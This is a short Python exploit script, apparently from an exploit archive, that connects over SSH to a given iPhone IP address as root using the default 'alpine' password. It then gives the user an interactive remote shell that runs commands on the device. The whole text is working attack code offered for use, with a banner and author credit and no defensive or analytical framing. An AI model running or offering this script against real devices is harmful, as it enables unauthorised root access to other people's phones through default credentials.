#!/usr/bin/python # This software opens a simple shell where you can type commands to send and works without Metasploit # Exploit Title: Apple iPhone iOS Default SSH Remote Command Execution exploit # Exploit Author: D35m0nd142 # Date: 17/02/2013 # Vendor Homepage: http://www.apple.com # Screenshot: http://imageshack.us/photo/my-images/713/iphoneexploit.png/ # Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium - Backbox import paramiko import sys,time import os os.system("clear") iphoneip = sys.argv[1] print "==================================================================" print "= Apple iPhone iOS SSH Remote Command Execution exploit =" print "= Created by D35m0nd142 =" print "==================================================================\n" #def usage(): # if len(sys.argv) != 2: # print "Usage: python exploit.py <iphone_ip> \n" # sys.exit(1) def exploit(iphoneip,cmd): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(iphoneip,username='root',password='alpine') stdin, stdout, stderr = ssh.exec_command(cmd) resp = stdout.readlines() print resp ssh.close() #usage() time.sleep(1.3) cmd = " " while (cmd != "quit"): try: cmd = raw_input("shell:~# ") exploit(iphoneip,cmd) except KeyboardInterrupt: print "\nExiting . . \n" sys.exit(1)